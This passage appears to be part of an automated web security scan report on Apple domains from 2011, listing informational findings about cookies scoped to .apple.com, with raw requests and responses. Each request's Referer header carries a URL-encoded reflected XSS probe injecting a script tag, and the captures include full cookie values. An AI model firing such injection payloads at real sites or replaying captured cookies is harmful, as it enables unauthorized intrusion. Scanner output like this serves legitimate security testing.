Referer: http://consultants.apple.com/services.php/fca6c%22%3E%3Cscript%3Ealert%28document.location%29%3C/script%3Ec29f000149b
Cookie: s_cvp35b=%5B%5B'www.fakereferrerdominator.com'%2C'1310698467867'%5D%2C%5B'OAS-US-DOMAINS-mac.com'%2C'1310703720371'%5D%2C%5B'oas-us-domains-mac.com'%2C'1310703744694'%5D%2C%5B'www.fakereferrerdominator.com'%2C'1310911506300'%5D%2C%5B'OAS-US-DOMAINS-guide.apple.com'%2C'1310911669487'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D8%3Bch%3Dsafari%26vn%3D2%3Bch%3Ddeveloper%26vn%3D4%3Bch%3Dbuy%26vn%3D2%3Bch%3Dsearch%26vn%3D1%3Bch%3Dhomepage%26vn%3D2%3Bch%3Dicloud%26vn%3D2%3Bch%3Dcontact%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dmyappleid.iforgot%26vn%3D4%3Bch%3Dmac%26vn%3D1%3Bch%3Dmacosx%26vn%3D2%3Bch%3Djobs%26vn%3D1%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dtrailers%26vn%3D1%3Bch%3Dipod%26vn%3D1%3Bch%3Ditunes%26vn%3D2%3Bch%3Dmyappleid%26vn%3D2%3Bch%3Dali%26vn%3D2%3Bch%3Daccess%20management%26vn%3D1%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dmacosx.downloads%26vn%3D1%3B; s_vi=[CS]v1|27065B988515A4F3-400001A7E000BF83[CE]; POD=us~en; ac_search=xss%7C%7C%7C%7Cxssxss; dssid2=ab5a5410-d10e-4162-a971-27aa89f1d005; ac_survey=1; s_membership=1%3Aaid; dslang=US-EN
If-Modified-Since: Mon, 16 May 2011 23:19:02 GMT
If-None-Match: "52da-4a36ce1818580"

Response

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Mon, 16 May 2011 23:19:02 GMT
ETag: "52da-4a36ce1818580"
Cache-Control: max-age=364
Expires: Tue, 19 Jul 2011 18:56:44 GMT
Date: Tue, 19 Jul 2011 18:50:40 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=m9/CPkw5LYIvCVzI84KswFfsTPWQTIJawwQIZs9o2PB0TBT1ovgy3ln6NmgFVXWxe28ZkpzYNgIOieP+3eWkJAxVytLayQ1tfgMcX6DRdUmAnmimWKGqd1xzwenJEayZwv7uxmhSF3CLrp93uSRC4YAAo8gcHB6esH9FOaxBi4Flva6z29KPIxWB7aWVfwK2AKRb4ZCDECK/uY3+TvkeJeYH5GbI/qWQEudByrxnPrDLhuhhyWCvk+8ARqzhXx5rlLcRqDZbVkEN6MgXCE6VIleRIOzVcf8J9TlQ/WwKlsu3VInW+sFCFQcJve8SUEbn+2GSz2o4ZnWqP0VnTvJAfyRsLxqbEMtCt29XklyX2RYPUMNix5b/oCM/cW4vKZfJT1Y9vGXe0Fjvva6FucMUCdROvPiCeFfQKEQv6GlbBv6I58Od4d6gv9Qh9/PMPhmzbNRdfR+EREc/ZOaKdVdHWAQB6kgbzc+xtEev6d2e5xvlYpQO/MuQLYnWwIRc3zu7hyz4n2T+tx27XrIVxumLBYm7MT7koJZi7SrwP50EfcHb+NaXkzPal8ObUbigg59I; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com


13.64. http://images.apple.com/global/scripts/browserdetect.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.apple.com
Path:   /global/scripts/browserdetect.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/scripts/browserdetect.js HTTP/1.1
Host: images.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants.apple.com/services.php/fca6c%22%3E%3Cscript%3Ealert%28document.location%29%3C/script%3Ec29f000149b
Cookie: s_cvp35b=%5B%5B'www.fakereferrerdominator.com'%2C'1310698467867'%5D%2C%5B'OAS-US-DOMAINS-mac.com'%2C'1310703720371'%5D%2C%5B'oas-us-domains-mac.com'%2C'1310703744694'%5D%2C%5B'www.fakereferrerdominator.com'%2C'1310911506300'%5D%2C%5B'OAS-US-DOMAINS-guide.apple.com'%2C'1310911669487'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D8%3Bch%3Dsafari%26vn%3D2%3Bch%3Ddeveloper%26vn%3D4%3Bch%3Dbuy%26vn%3D2%3Bch%3Dsearch%26vn%3D1%3Bch%3Dhomepage%26vn%3D2%3Bch%3Dicloud%26vn%3D2%3Bch%3Dcontact%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dmyappleid.iforgot%26vn%3D4%3Bch%3Dmac%26vn%3D1%3Bch%3Dmacosx%26vn%3D2%3Bch%3Djobs%26vn%3D1%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dtrailers%26vn%3D1%3Bch%3Dipod%26vn%3D1%3Bch%3Ditunes%26vn%3D2%3Bch%3Dmyappleid%26vn%3D2%3Bch%3Dali%26vn%3D2%3Bch%3Daccess%20management%26vn%3D1%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dmacosx.downloads%26vn%3D1%3B; s_vi=[CS]v1|27065B988515A4F3-400001A7E000BF83[CE]; POD=us~en; ac_search=xss%7C%7C%7C%7Cxssxss; dssid2=ab5a5410-d10e-4162-a971-27aa89f1d005; ac_survey=1; s_membership=1%3Aaid; dslang=US-EN
If-Modified-Since: Sat, 04 Jun 2011 18:36:31 GMT
If-None-Match: "25fd-4a4e72621e9c0"

Response

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Sat, 04 Jun 2011 18:36:31 GMT
ETag: "25fd-4a4e72621e9c0"
Cache-Control: max-age=524
Expires: Tue, 19 Jul 2011 18:59:24 GMT
Date: Tue, 19 Jul 2011 18:50:40 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=W9d+P/weFqXFr6H8nSQrFNjrX108Oe5VqptvfEBzDpvj68l+vIceQs0teSQaTJ2djpwcgjtR7a+Mxj5YgWVADoEk5u0RQjgnZEVBo3iTA57e3UARWFfTplsk3U6C5f7uX6Mo4Nr1OLUNearzGAZ2qAVp1s55m45QcPHq6T7rhJ6m8lzGcTv9INR0f72zHNlk/M0vXA4TsCidLkg639JfMpJgNuNE1Z5UQj/JRfdFAVHq51xfp0n8+cAXYl7s+e4hNqrCWONWevzft2zI65Hcnnc4FcKlwNe+u5BCmi9Mj3anmM2oAHjs2GJPNPwhULU5DsUKSa6duqb+SxJ1ryW1aOPfPe+Po2zxh0fHYIMN3DPkf8uAtycmQGsMpDKG1MEf0h+bg3hhvqDeHqnMdlKdd2mnZM/fBUoAkdMK3MJkx4BysVjUzu5dFAyx3QsB+0GgSKBUc/IGUlBIyEW4OBiK6gPf85aoUMR9CLeU47799FK23u4kbVxYSYQIlMtN4LqZRfteAXVJLMdyEM5uT6fEByeDHgwtljUe44mrZNHWePZM4qeLDoVKQXnQI89j2bpl; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com


13.65. http://images.apple.com/global/scripts/content_swap.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.apple.com
Path:   /global/scripts/content_swap.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/scripts/content_swap.js HTTP/1.1
Host: images.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants.apple.com/services.php/fca6c%22%3E%3Cscript%3Ealert%28document.location%29%3C/script%3Ec29f000149b
Cookie: s_cvp35b=%5B%5B'www.fakereferrerdominator.com'%2C'1310698467867'%5D%2C%5B'OAS-US-DOMAINS-mac.com'%2C'1310703720371'%5D%2C%5B'oas-us-domains-mac.com'%2C'1310703744694'%5D%2C%5B'www.fakereferrerdominator.com'%2C'1310911506300'%5D%2C%5B'OAS-US-DOMAINS-guide.apple.com'%2C'1310911669487'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D8%3Bch%3Dsafari%26vn%3D2%3Bch%3Ddeveloper%26vn%3D4%3Bch%3Dbuy%26vn%3D2%3Bch%3Dsearch%26vn%3D1%3Bch%3Dhomepage%26vn%3D2%3Bch%3Dicloud%26vn%3D2%3Bch%3Dcontact%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dmyappleid.iforgot%26vn%3D4%3Bch%3Dmac%26vn%3D1%3Bch%3Dmacosx%26vn%3D2%3Bch%3Djobs%26vn%3D1%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dtrailers%26vn%3D1%3Bch%3Dipod%26vn%3D1%3Bch%3Ditunes%26vn%3D2%3Bch%3Dmyappleid%26vn%3D2%3Bch%3Dali%26vn%3D2%3Bch%3Daccess%20management%26vn%3D1%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dmacosx.downloads%26vn%3D1%3B; s_vi=[CS]v1|27065B988515A4F3-400001A7E000BF83[CE]; POD=us~en; ac_search=xss%7C%7C%7C%7Cxssxss; dssid2=ab5a5410-d10e-4162-a971-27aa89f1d005; ac_survey=1; s_membership=1%3Aaid; dslang=US-EN
If-Modified-Since: Tue, 18 Nov 2008 01:42:58 GMT
If-None-Match: "864-45becd0a92c80"

Response

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Tue, 18 Nov 2008 01:42:58 GMT
ETag: "864-45becd0a92c80"
Cache-Control: max-age=447
Expires: Tue, 19 Jul 2011 18:58:07 GMT
Date: Tue, 19 Jul 2011 18:50:40 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=yset3HlqlXXedErdrhfwFqlK7fPqM3ABNKuAZC58cwdxh7SdMXx+EqpxTqphBovEWPqGrq17zqIGw0tCohwrnSxToTuKbnQnGgu3T9eIk+BT7aZVOK79Rpk7FQFNJ0OgNxj5/KTmw/1CDlXKxb88sPBWbL4TfCoMwRDqTEo273pvf+WKVsLRU9JkU0K9BDODHX+dvYrIR8iTFrcccwdGqkJV3euxF1RsybNzNGSiYrfcYKlfu8h2lY8LYmGHY2b20GywOs70THudYHDvIf6JziCzOJTf/F1be8SGBq14vEBmUGGd9t62bmSQUHh++p+1Phub0kwrIUTCr7+7szmbQVYAVMI0u0LFe3rtUmSKwoW2M1zS/2zk6/pzwCUd7+yBmf+0f88i26KxzaHE1c4uxN5cQf/s1/PFJU/Zii3Qp9OjxltvMY3MngUN4ZXYCdrqWeV7+msCzSToLtJPlDDoDgkaPUj4vNfMd3s3Td67C9yEXKxbLkDTalMdHl5EWpw0uW0OZOs3T2djrXkhCZ8xwwGUy8+tHLRzOFWbcgrq1UHNsiHE36xYCxJv/epLnHSY; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com


13.66. http://images.apple.com/global/scripts/lib/event_mixins.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.apple.com
Path:   /global/scripts/lib/event_mixins.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/scripts/lib/event_mixins.js HTTP/1.1
Host: images.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants.apple.com/services.php/fca6c%22%3E%3Cscript%3Ealert%28document.location%29%3C/script%3Ec29f000149b
Cookie: s_cvp35b=%5B%5B'www.fakereferrerdominator.com'%2C'1310698467867'%5D%2C%5B'OAS-US-DOMAINS-mac.com'%2C'1310703720371'%5D%2C%5B'oas-us-domains-mac.com'%2C'1310703744694'%5D%2C%5B'www.fakereferrerdominator.com'%2C'1310911506300'%5D%2C%5B'OAS-US-DOMAINS-guide.apple.com'%2C'1310911669487'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D8%3Bch%3Dsafari%26vn%3D2%3Bch%3Ddeveloper%26vn%3D4%3Bch%3Dbuy%26vn%3D2%3Bch%3Dsearch%26vn%3D1%3Bch%3Dhomepage%26vn%3D2%3Bch%3Dicloud%26vn%3D2%3Bch%3Dcontact%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dmyappleid.iforgot%26vn%3D4%3Bch%3Dmac%26vn%3D1%3Bch%3Dmacosx%26vn%3D2%3Bch%3Djobs%26vn%3D1%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dtrailers%26vn%3D1%3Bch%3Dipod%26vn%3D1%3Bch%3Ditunes%26vn%3D2%3Bch%3Dmyappleid%26vn%3D2%3Bch%3Dali%26vn%3D2%3Bch%3Daccess%20management%26vn%3D1%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dmacosx.downloads%26vn%3D1%3B; s_vi=[CS]v1|27065B988515A4F3-400001A7E000BF83[CE]; POD=us~en; ac_search=xss%7C%7C%7C%7Cxssxss; dssid2=ab5a5410-d10e-4162-a971-27aa89f1d005; ac_survey=1; s_membership=1%3Aaid; dslang=US-EN
If-Modified-Since: Fri, 11 Jul 2008 11:54:18 GMT
If-None-Match: "1fc2-451be3396ce80"

Response

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Fri, 11 Jul 2008 11:54:18 GMT
ETag: "1fc2-451be3396ce80"
Cache-Control: max-age=345
Expires: Tue, 19 Jul 2011 18:56:25 GMT
Date: Tue, 19 Jul 2011 18:50:40 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=sBVN3TbalgB5E4m7E2xJmh0tmzDg2x54HfrzCe1cTPY/JCCdkEWUzjsmaMQ+M+20mvHYnyoNpkw/0GE+0PvYuDoDWuxsH+O1SX7ECNzZCPm+y3dS3i/+9OXsY1OnxfDzuDZK8QHdTyJFaUXXMMF6x5TlnphpmdnubPhpBm5ifixOdVBey0Iu322OO4vxLb4/mkNtVxBpebhlf1AFNnfUVoQGmzco212M5bUx68c5kVY/rO4FXA8Sw14poHM86i3S+0T8rkrHw68Nbi/R9JRHGuNDvreVVKff3A7A3CFjHzY9nTGS19mlXN0xoWF4grvxy+fG84px5BkF5ZsGz4ZGDc/6Ozi7MiWdA6dLP4DNSVxtKK1aV4tk5v/eHC1ThR4yBjGjQVwhBbsxdhErZ960BpYWHkPzQoLSnGp4/blKB5yhJAfvpDqw15ZTt7E4YUS0cA1nqyyl+NXX17fxrkuYu6tl01HkGv4cY0LoiO+iMYbjZVt7ZuOzSFuStNQSR67hb/fOAgJ5XkzMcyCaQi3Dq+ECqimj/QsOc4882PVjSLDy777hpnD72Tft8IAxZBU9; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com


13.67. http://images.apple.com/global/scripts/lib/prototype.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.apple.com
Path:   /global/scripts/lib/prototype.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/scripts/lib/prototype.js HTTP/1.1
Host: images.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants.apple.com/services.php/fca6c%22%3E%3Cscript%3Ealert%28document.location%29%3C/script%3Ec29f000149b
Cookie: s_cvp35b=%5B%5B'www.fakereferrerdominator.com'%2C'1310698467867'%5D%2C%5B'OAS-US-DOMAINS-mac.com'%2C'1310703720371'%5D%2C%5B'oas-us-domains-mac.com'%2C'1310703744694'%5D%2C%5B'www.fakereferrerdominator.com'%2C'1310911506300'%5D%2C%5B'OAS-US-DOMAINS-guide.apple.com'%2C'1310911669487'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D8%3Bch%3Dsafari%26vn%3D2%3Bch%3Ddeveloper%26vn%3D4%3Bch%3Dbuy%26vn%3D2%3Bch%3Dsearch%26vn%3D1%3Bch%3Dhomepage%26vn%3D2%3Bch%3Dicloud%26vn%3D2%3Bch%3Dcontact%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dmyappleid.iforgot%26vn%3D4%3Bch%3Dmac%26vn%3D1%3Bch%3Dmacosx%26vn%3D2%3Bch%3Djobs%26vn%3D1%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dtrailers%26vn%3D1%3Bch%3Dipod%26vn%3D1%3Bch%3Ditunes%26vn%3D2%3Bch%3Dmyappleid%26vn%3D2%3Bch%3Dali%26vn%3D2%3Bch%3Daccess%20management%26vn%3D1%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dmacosx.downloads%26vn%3D1%3B; s_vi=[CS]v1|27065B988515A4F3-400001A7E000BF83[CE]; POD=us~en; ac_search=xss%7C%7C%7C%7Cxssxss; dssid2=ab5a5410-d10e-4162-a971-27aa89f1d005; ac_survey=1; s_membership=1%3Aaid; dslang=US-EN
If-Modified-Since: Thu, 31 Mar 2011 00:21:09 GMT
If-None-Match: "27df1-49fbc451c6740"

Response

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Thu, 31 Mar 2011 00:21:09 GMT
ETag: "27df1-49fbc451c6740"
Cache-Control: max-age=462
Expires: Tue, 19 Jul 2011 18:58:22 GMT
Date: Tue, 19 Jul 2011 18:50:40 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=hMyCmLF+YsroMeGIo0mEk3STgu7UYkNoKxupEtmb3LVs/Fn3urFJcVbv7h5V+5y0Go9jUjbAhCUQ9eExHixVAfNzygpZjF1oc3AG0bubbEVlPzjVH6Adnne50hBhYnVY9bZbpB+/BN5tt+aN7AazSN0+OMySApYdn0gDrEmFqaXR7CFdWG/FgcDPEEfAcovhD7EYb6D+nYw/aW1VIKmc53GWjLK9LHxCIQbpHoIHnqY4JJoKVL8itd8BSK42z4SOwOTXZhOcNVrntM/inbSztqwO0DVmWnKDMM/P4GrjUwbdmfh3d/7434snspLKsSy3FAHLQ3NH4kYba/1JwYTThA07i6rPYxcaOuoAQN7kfMei6SBfLUHAtIbkoMNi696fSbk/GqR7U3i6gC+iOamYT/NaUQFqPSKEtx4XAXdjAh8VvFS+dZ59yR/yoyMgrds8layxUG/JSESb1MvvrdU8UIEkn4FNus6vUMHl1vzz8f8SOTEo2OMAabczdG6gKhOiVOqFgVoGAqNLsFQdbzB4zy0FSnREg2NSPZkV0Mb6Z+vBtS+2Gzqbtw44WG/1OnJc; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com


13.68. http://images.apple.com/global/scripts/lib/scriptaculous.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.apple.com
Path:   /global/scripts/lib/scriptaculous.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/scripts/lib/scriptaculous.js HTTP/1.1
Host: images.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants.apple.com/services.php/fca6c%22%3E%3Cscript%3Ealert%28document.location%29%3C/script%3Ec29f000149b
Cookie: s_cvp35b=%5B%5B'www.fakereferrerdominator.com'%2C'1310698467867'%5D%2C%5B'OAS-US-DOMAINS-mac.com'%2C'1310703720371'%5D%2C%5B'oas-us-domains-mac.com'%2C'1310703744694'%5D%2C%5B'www.fakereferrerdominator.com'%2C'1310911506300'%5D%2C%5B'OAS-US-DOMAINS-guide.apple.com'%2C'1310911669487'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D8%3Bch%3Dsafari%26vn%3D2%3Bch%3Ddeveloper%26vn%3D4%3Bch%3Dbuy%26vn%3D2%3Bch%3Dsearch%26vn%3D1%3Bch%3Dhomepage%26vn%3D2%3Bch%3Dicloud%26vn%3D2%3Bch%3Dcontact%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dmyappleid.iforgot%26vn%3D4%3Bch%3Dmac%26vn%3D1%3Bch%3Dmacosx%26vn%3D2%3Bch%3Djobs%26vn%3D1%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dtrailers%26vn%3D1%3Bch%3Dipod%26vn%3D1%3Bch%3Ditunes%26vn%3D2%3Bch%3Dmyappleid%26vn%3D2%3Bch%3Dali%26vn%3D2%3Bch%3Daccess%20management%26vn%3D1%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dmacosx.downloads%26vn%3D1%3B; s_vi=[CS]v1|27065B988515A4F3-400001A7E000BF83[CE]; POD=us~en; ac_search=xss%7C%7C%7C%7Cxssxss; dssid2=ab5a5410-d10e-4162-a971-27aa89f1d005; ac_survey=1; s_membership=1%3Aaid; dslang=US-EN
If-Modified-Since: Tue, 13 May 2008 05:05:45 GMT
If-None-Match: "1cf46-44d159ddcfc40"

Response

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Tue, 13 May 2008 05:05:45 GMT
ETag: "1cf46-44d159ddcfc40"
Cache-Control: max-age=403
Expires: Tue, 19 Jul 2011 18:57:23 GMT
Date: Tue, 19 Jul 2011 18:50:40 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=b0z9opXdW37drfDfyMKib4xNpnFpP9m+gj5KUJnAOz3PjFPvhXjCszkAFvAFuV/gcgrqMXyNcPXYm95N2qr1UA5Beq2Qg2/fBWvUJxn/PLs4urDm8oDEz0V9Vjw9u9T0sAWm5dM9Ife+3gnHwmLNx6rmZhDdUjitHJzOfKSsbkWqjY5QiiryzykhI0Cp5hiplk03WNr93Gvm00fJ68CJQgx3oxnz+Tcvt8xxRGc4hPpQRIwvoS9YCmRCFkjFLu+iZCdBfosP+ezysYfkB0WF0SoYwu6lT6T47vNuyZJQQGZvjgTYbia5ACFHDi1emMISu8eEO9JKoafuPu+/EP1ozm5XmArYvYTWZLXVQEWyDrgGITPxRTOsRYja56nXmRVzIUtsVwx+nTB7DT0pKu5F2jmIGM5geNmpd+w1mH9vKeSqK/3clVku0EA2pTtjPkoTSs4aSWVNQZrG4sOb6yqgaxl4+cpYNXhZSxOr34gBYV2XHdvBlA0dpS5XLgy6HbDpNp/Ny5K9K3isKGHjCuQvDEyPsCXOrWLHmtJn79hNa1i5wEkPBAYbYOLjQmrlA+ga; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com


13.69. http://images.apple.com/global/scripts/overlay_panel.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.apple.com
Path:   /global/scripts/overlay_panel.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/scripts/overlay_panel.js HTTP/1.1
Host: images.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants.apple.com/services.php/fca6c%22%3E%3Cscript%3Ealert%28document.location%29%3C/script%3Ec29f000149b
Cookie: s_cvp35b=%5B%5B'www.fakereferrerdominator.com'%2C'1310698467867'%5D%2C%5B'OAS-US-DOMAINS-mac.com'%2C'1310703720371'%5D%2C%5B'oas-us-domains-mac.com'%2C'1310703744694'%5D%2C%5B'www.fakereferrerdominator.com'%2C'1310911506300'%5D%2C%5B'OAS-US-DOMAINS-guide.apple.com'%2C'1310911669487'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D8%3Bch%3Dsafari%26vn%3D2%3Bch%3Ddeveloper%26vn%3D4%3Bch%3Dbuy%26vn%3D2%3Bch%3Dsearch%26vn%3D1%3Bch%3Dhomepage%26vn%3D2%3Bch%3Dicloud%26vn%3D2%3Bch%3Dcontact%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dmyappleid.iforgot%26vn%3D4%3Bch%3Dmac%26vn%3D1%3Bch%3Dmacosx%26vn%3D2%3Bch%3Djobs%26vn%3D1%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dtrailers%26vn%3D1%3Bch%3Dipod%26vn%3D1%3Bch%3Ditunes%26vn%3D2%3Bch%3Dmyappleid%26vn%3D2%3Bch%3Dali%26vn%3D2%3Bch%3Daccess%20management%26vn%3D1%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dmacosx.downloads%26vn%3D1%3B; s_vi=[CS]v1|27065B988515A4F3-400001A7E000BF83[CE]; POD=us~en; ac_search=xss%7C%7C%7C%7Cxssxss; dssid2=ab5a5410-d10e-4162-a971-27aa89f1d005; ac_survey=1; s_membership=1%3Aaid; dslang=US-EN
If-Modified-Since: Wed, 30 Mar 2011 22:24:08 GMT
If-None-Match: "2be4-49fbaa2a07200"

Response

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Wed, 30 Mar 2011 22:24:08 GMT
ETag: "2be4-49fbaa2a07200"
Cache-Control: max-age=459
Expires: Tue, 19 Jul 2011 18:58:19 GMT
Date: Tue, 19 Jul 2011 18:50:40 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=YTXNJI3FCQgB8dxsD7AqY057PByO/l2zbgH2wFRDrum3Ig6uCv0TBq2YpQf7se3WXtxZIAuMgq2gqgzWOIWTaNykftxf5IuPXpHcSkePmbVV+WxpHpMfEQ63QCxuF/gYS66T0bwSMAKw72SU24T0S3/O3qpnD/mmKl7Djfib8oqwY+QyAUn2FVU1LLelD8bHgt+60axQ6wI9FSa+KYIwnLpx4+xeWRCtXubNAG9x/mLbJ/s0EEyJeqrb2Q0pB6/wfaIXuCRTZZNxgx/LBjRvOtP8/oWh6RWWi1Td+4SJRN+LroThUN8oONNoPYNkLPBhxbcm7HKbIkaiccBRGdO8lUPZjKAbR0UdHCjCFYFNTD2+qZGMw3rQ9FN08c7dTDK/V1ppOWGYffKVJmx2tQJA6hS+SsKZ9tgXMThwD4teMLUnpzpJ6Ba6h+xt0pOR8ptOaucyf2mlsCzSuyu3DvQMHTKxLaaetcHng+vBxmvEmfV5kJzIxGA/XSsoHS8LcT3UEEK2nlhphXHvP3Zp69rkoEX3DHA9ArlKEwfvB/dCK4doNvsHYUK3nb20cjYge1zw; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com


13.70. http://images.apple.com/global/scripts/search_decorator.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.apple.com
Path:   /global/scripts/search_decorator.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/scripts/search_decorator.js HTTP/1.1
Host: images.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants.apple.com/services.php/fca6c%22%3E%3Cscript%3Ealert%28document.location%29%3C/script%3Ec29f000149b
